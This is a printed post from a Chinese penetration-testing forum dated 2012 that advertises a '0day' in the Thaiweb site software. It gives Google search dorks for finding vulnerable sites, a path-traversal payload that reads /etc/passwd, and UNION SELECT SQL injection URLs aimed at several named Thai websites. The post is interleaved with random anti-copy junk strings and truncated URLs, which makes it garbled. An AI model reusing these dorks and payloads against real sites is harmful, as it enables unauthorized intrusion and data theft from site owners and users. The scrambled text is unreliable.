中国网络渗透测试联盟

标题: Thaiweb远程文件sql注入漏洞0day [打印本页]

作者: admin    时间: 2012-12-27 08:38
标题: Thaiweb远程文件sql注入漏洞0day
Google之:
6 z: h$ O6 V: m) N( e! f: N
- P' X) `4 j6 c" p# j4 A5 Uintext:powered by Thaiweb
  F( `) L/ o, _8 b6 f" b+ V# L
0 U( y" V) |& R$ S1 ]inurl:index.php?page=board.php
3 ]! {# y' D  y2 X3 C: R/ Q+ ^8 Z' A) W. Y- b
: G( e7 z. \" e4 p, U) T
8 S$ Y# j/ ?; z" Z! F" j, o  h
利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd
: \6 O  J* Q' ^9 P5 d$ d1 u2 C  l6 O( `# ]7 U
  m8 U- g+ g' W* Z. t5 I  q' P

0 ?/ y& ^2 s/ C' u7 D利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4', j/ Q# E8 K  [! A" O& F* d

/ n, j" s/ \8 G7 l ( H$ }( r6 i7 K  |

8 W4 y! V: @0 e, F: D% Dhttp://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--1 ?9 i7 b! H- U# K* r

( l' Q9 `% k# g/ g3 `9 ahttp://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--8 O3 l; x  w$ P: v7 F: V" d
4 l' Z, [+ v. z5 V8 y# a( ~
http://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
; s7 m9 ^" S. ?$ J! }: T




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2